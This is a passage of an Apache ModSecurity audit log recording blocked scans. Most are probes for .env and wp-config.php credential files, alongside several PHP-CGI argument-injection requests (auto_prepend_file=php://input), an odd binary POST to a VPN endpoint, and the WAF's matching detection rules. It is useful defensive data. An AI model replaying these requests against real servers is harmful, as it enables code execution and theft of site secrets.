Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad31ae0b-Z-- --064c2c43-A-- [02/May/2025:21:49:43 +0700] aBTbh6GyUvHV-cebb642IwAAAEw 103.236.140.4 36428 103.236.140.4 8181 --064c2c43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; WAS-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --064c2c43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --064c2c43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746197383813190 859 (- - -) Stopwatch2: 1746197383813190 859; combined=350, p1=306, p2=0, p3=0, p4=0, p5=44, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --064c2c43-Z-- --80fdef48-A-- [02/May/2025:22:37:07 +0700] aBTmo_NNWdC6CAybkqMQdQAAAM4 103.236.140.4 36652 103.236.140.4 8181 --80fdef48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.231.75.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.231.75.61 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --80fdef48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80fdef48-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746200227587268 831 (- - -) Stopwatch2: 1746200227587268 831; combined=345, p1=302, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80fdef48-Z-- --d316625f-A-- [02/May/2025:22:37:08 +0700] aBTmpBXwRgnphTBdhpRpzwAAAIE 103.236.140.4 36654 103.236.140.4 8181 --d316625f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.231.75.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.231.75.61 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.32.3 Accept: */* --d316625f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d316625f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746200228498237 738 (- - -) Stopwatch2: 1746200228498237 738; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d316625f-Z-- --605df467-A-- [02/May/2025:23:06:54 +0700] aBTtnhXwRgnphTBdhpRqAQAAAIw 103.236.140.4 37062 103.236.140.4 8181 --605df467-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 139.59.132.8 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --605df467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --605df467-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746202014131153 946 (- - -) Stopwatch2: 1746202014131153 946; combined=354, p1=303, p2=0, p3=0, p4=0, p5=50, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --605df467-Z-- --751fbe37-A-- [02/May/2025:23:13:10 +0700] aBTvFhXwRgnphTBdhpRqCgAAAJQ 103.236.140.4 37136 103.236.140.4 8181 --751fbe37-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --751fbe37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --751fbe37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746202390135194 739 (- - -) Stopwatch2: 1746202390135194 739; combined=308, p1=276, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --751fbe37-Z-- --63e4e95b-A-- [02/May/2025:23:20:53 +0700] aBTw5RXwRgnphTBdhpRqGwAAAI0 103.236.140.4 37252 103.236.140.4 8181 --63e4e95b-B-- GET /admin/config.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 87.106.86.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 87.106.86.89 X-Forwarded-Proto: http Connection: close User-Agent: Accept: */* --63e4e95b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --63e4e95b-H-- Message: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "120"] [id "217240"] [rev "3"] [msg "COMODO WAF: Empty User Agent Header||103.236.140.4|F|5"] [data "REQUEST_HEADERS:User-Agent="] [severity "NOTICE"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746202853796375 4057 (- - -) Stopwatch2: 1746202853796375 4057; combined=2512, p1=427, p2=1988, p3=31, p4=37, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63e4e95b-Z-- --57ffbb64-A-- [02/May/2025:23:40:27 +0700] aBT1exXwRgnphTBdhpRqQgAAAIY 103.236.140.4 37408 103.236.140.4 8181 --57ffbb64-B-- POST /vpnsvc/connect.cgi HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.90.246.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.90.246.159 X-Forwarded-Proto: https Connection: close Content-Length: 1684 Content-Type: image/jpeg X-SSL-VPN: 1 --57ffbb64-C-- GIF89aÈ3ò674yhT€€€¯[³¨ÕÕÔÿÿÿ,È3þÜ4 Ake1O€ù`(Ždižhª®lëšKã %oV§éÒëÿÀ pÈŠÜ,œÆÇ1f$¢tJ­N± aË%Ô¸I汚Ïèô+t …xü nŸê5ï)j, n\rˆzzoMw%qq/’•€"H}˜š|‚#kHp#}˜¨!‡‰µ‹|{<Ž#ž›®+­ ¦¬›±Ã!±ž"ž®Å™ –¯Æ p¶¶[Že!½›Ë*žËÁáѧ©néÖ‚ÍÉÊÕÑ®½Ë¬´Ùs47vß<ÈšBN8L« úêR Û5ÓóÎÙ,r·@"èþ°aÇOì@~”öP6ƒ¨jyùwã(iU gŠ©RÅPqB‚1Ú´Vq¼ò'I>ïq þH6]$Á©°iêpì´Æ&ÙE Œ ,Ðv*-µà¾š¤!¹ GnŸµÚê(±%ˆTÒ˜Õ§ 1ö%3JHŸ€4¦ tV¡¯m'ALy¡._ªgïÓ0¼ð½îÞë0Wó6L¿[¼o—›±± YÈ0œÈÛhšê +pqdz’q¾g<ñWøÂlÄî²'3¼:Ã,/ÄìŒ%ñ»ý~²Ä‘[2TF·òÌÏqÄ@ƒò0Æú’’5ÃSC‡_שpݰÎbWmö˜M‹<2Ò䦊°_OËuÌeW½/ÙC;ìõÄùjírË6¿,¸b~Ÿ-øi‡±ö?kª šÂ|·û÷àcþÇ'5ÝÓm6ÔrSùÔÛøè$,°D,™ÞmšïzËž»5éyË9éðŽ­{؆S È¿ sn€9œ'r:´ívë^ÃDøMñî ØÍz÷ýÐïãýõ`½³Ï¢ã¹¦Ÿn| è`-´ìNw¸|œñØ`nh/ hT*Kþ>üjÊW¿Ð˜+ ù€!nÕ::0 ´Žà#Hðg Ü÷Þõ?ùy)R|`p7»µÀî}!”B Eè±Ø¹nkàš Y–µœÙPl¾;JçX( &xaëYä~ø¹Ýᬈe«3 ÆÎ‡«˜ Ù3ÅÀÙ­Up;\â¡'»¼os¶Óœa':Ài„—s¢ƒ¸;ª ñ‹PâÏØÃ4–†ƒ«!½7CÎN‡ã£c¸V(ÈB‚°h†L¤"ÉÈF:ò‘Œ¤$u•;Spxæ×Q=chõf§ †ä†Mõ¥¨Ž‚=O„ºfò¶Cíø¸ü; Ð{[ö3½¢p¬¹û‹]qmû+èÛNQ®8ú€²¶9 ðN2–'ÉÕc¹ÈÅ‚)To7}ý(šª!=@Ó‚vºº;3 c^åqi„u\(VcĤùN½µ=÷!q{¤–ïÝBMéZÁ¹Âð—¹m“>“GP ±*+´‘Åø·kšx·ÀºØ|ª3Ž.iˆÐñqÉTÿ˜ý¶ž0 *çÕ0ZqÕ´´è…R¬ ß~_‰ŒÅECE¿‹E-vÎóaøÈÙH0%¢â›µlúDjNÄÆsvq&š0ÇàÕ BÄfM:Ã÷ --57ffbb64-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ffbb64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=image/jpeg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746204027723871 4707 (- - -) Stopwatch2: 1746204027723871 4707; combined=2915, p1=587, p2=2219, p3=35, p4=42, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ffbb64-Z-- --c6527261-A-- [03/May/2025:00:13:00 +0700] aBT9HBXwRgnphTBdhpRqzQAAAIQ 103.236.140.4 38016 103.236.140.4 8181 --c6527261-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 Accept-Charset: utf-8 --c6527261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6527261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746205980636541 755 (- - -) Stopwatch2: 1746205980636541 755; combined=302, p1=269, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6527261-Z-- --9ed42e48-A-- [03/May/2025:00:41:12 +0700] aBUDuPNNWdC6CAybkqMRFQAAAMo 103.236.140.4 38208 103.236.140.4 8181 --9ed42e48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.244.161.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.244.161.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9ed42e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ed42e48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746207672744259 901 (- - -) Stopwatch2: 1746207672744259 901; combined=347, p1=306, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ed42e48-Z-- --10f27300-A-- [03/May/2025:05:03:54 +0700] aBVBSkSOhfQ6W15Bgg_8HgAAAEY 103.236.140.4 49202 103.236.140.4 8181 --10f27300-B-- GET /admin/config.php HTTP/1.0 Host: 0.0.0.0 X-Real-IP: 188.166.16.179 X-Forwarded-Host: 0.0.0.0 X-Forwarded-Server: 0.0.0.0 X-Forwarded-For: 188.166.16.179 X-Forwarded-Proto: https Connection: close User-Agent: Accept: */* --10f27300-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --10f27300-H-- Message: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "120"] [id "217240"] [rev "3"] [msg "COMODO WAF: Empty User Agent Header||0.0.0.0|F|5"] [data "REQUEST_HEADERS:User-Agent="] [severity "NOTICE"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746223434970494 4760 (- - -) Stopwatch2: 1746223434970494 4760; combined=2902, p1=449, p2=2340, p3=40, p4=42, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10f27300-Z-- --11da5a6c-A-- [03/May/2025:05:08:16 +0700] aBVCUMP0ZqGY3Jj2X92H7wAAAAk 103.236.140.4 49236 103.236.140.4 8181 --11da5a6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.39.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.39.120 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --11da5a6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11da5a6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746223696225743 961 (- - -) Stopwatch2: 1746223696225743 961; combined=393, p1=351, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11da5a6c-Z-- --cd38d963-A-- [03/May/2025:09:07:04 +0700] aBV6SESOhfQ6W15Bgg_-GAAAAEQ 103.236.140.4 53842 103.236.140.4 8181 --cd38d963-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 94.152.13.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.152.13.32 X-Forwarded-Proto: http Connection: close Accept: */* --cd38d963-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd38d963-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746238024073086 836 (- - -) Stopwatch2: 1746238024073086 836; combined=328, p1=286, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd38d963-Z-- --fd8c4375-A-- [03/May/2025:09:13:38 +0700] aBV70sP0ZqGY3Jj2X92KMAAAAAM 103.236.140.4 53894 103.236.140.4 8181 --fd8c4375-B-- GET /wp-config.php.bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 146.190.86.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 146.190.86.222 X-Forwarded-Proto: http Connection: close Accept: */* --fd8c4375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd8c4375-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746238418434193 880 (- - -) Stopwatch2: 1746238418434193 880; combined=320, p1=278, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd8c4375-Z-- --7cb86b20-A-- [03/May/2025:12:10:25 +0700] aBWlQcP0ZqGY3Jj2X92NCwAAAAk 103.236.140.4 33210 103.236.140.4 8181 --7cb86b20-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.172.239.60 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.172.239.60 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --7cb86b20-C-- --7cb86b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb86b20-E-- --7cb86b20-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746249025414482 4777 (- - -) Stopwatch2: 1746249025414482 4777; combined=3035, p1=546, p2=2452, p3=0, p4=0, p5=37, sr=141, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb86b20-Z-- --8553ea48-A-- [03/May/2025:12:38:30 +0700] aBWr1oOgvPi2IO4kz1vsFgAAAJM 103.236.140.4 33896 103.236.140.4 8181 --8553ea48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.39.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.39.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8553ea48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8553ea48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746250710849750 849 (- - -) Stopwatch2: 1746250710849750 849; combined=376, p1=338, p2=0, p3=0, p4=0, p5=38, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8553ea48-Z-- --ed6fa66d-A-- [03/May/2025:15:26:37 +0700] aBXTPcP0ZqGY3Jj2X92O8gAAAAo 103.236.140.4 38480 103.236.140.4 8181 --ed6fa66d-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.65.202.153 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 159.65.202.153 Accept-Encoding: gzip X-Varnish: 142236315 --ed6fa66d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ed6fa66d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746260797532121 843 (- - -) Stopwatch2: 1746260797532121 843; combined=381, p1=347, p2=0, p3=0, p4=0, p5=34, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed6fa66d-Z-- --e862714a-A-- [03/May/2025:15:58:44 +0700] aBXaxESOhfQ6W15Bgg8C_QAAAFg 103.236.140.4 41330 103.236.140.4 8181 --e862714a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.128.39.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.128.39.37 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --e862714a-C-- --e862714a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e862714a-E-- --e862714a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746262724379002 4133 (- - -) Stopwatch2: 1746262724379002 4133; combined=2830, p1=467, p2=2331, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e862714a-Z-- --f65a2b3a-A-- [03/May/2025:16:11:21 +0700] aBXducP0ZqGY3Jj2X92Q_AAAABI 103.236.140.4 43596 103.236.140.4 8181 --f65a2b3a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --f65a2b3a-C-- --f65a2b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f65a2b3a-E-- --f65a2b3a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd 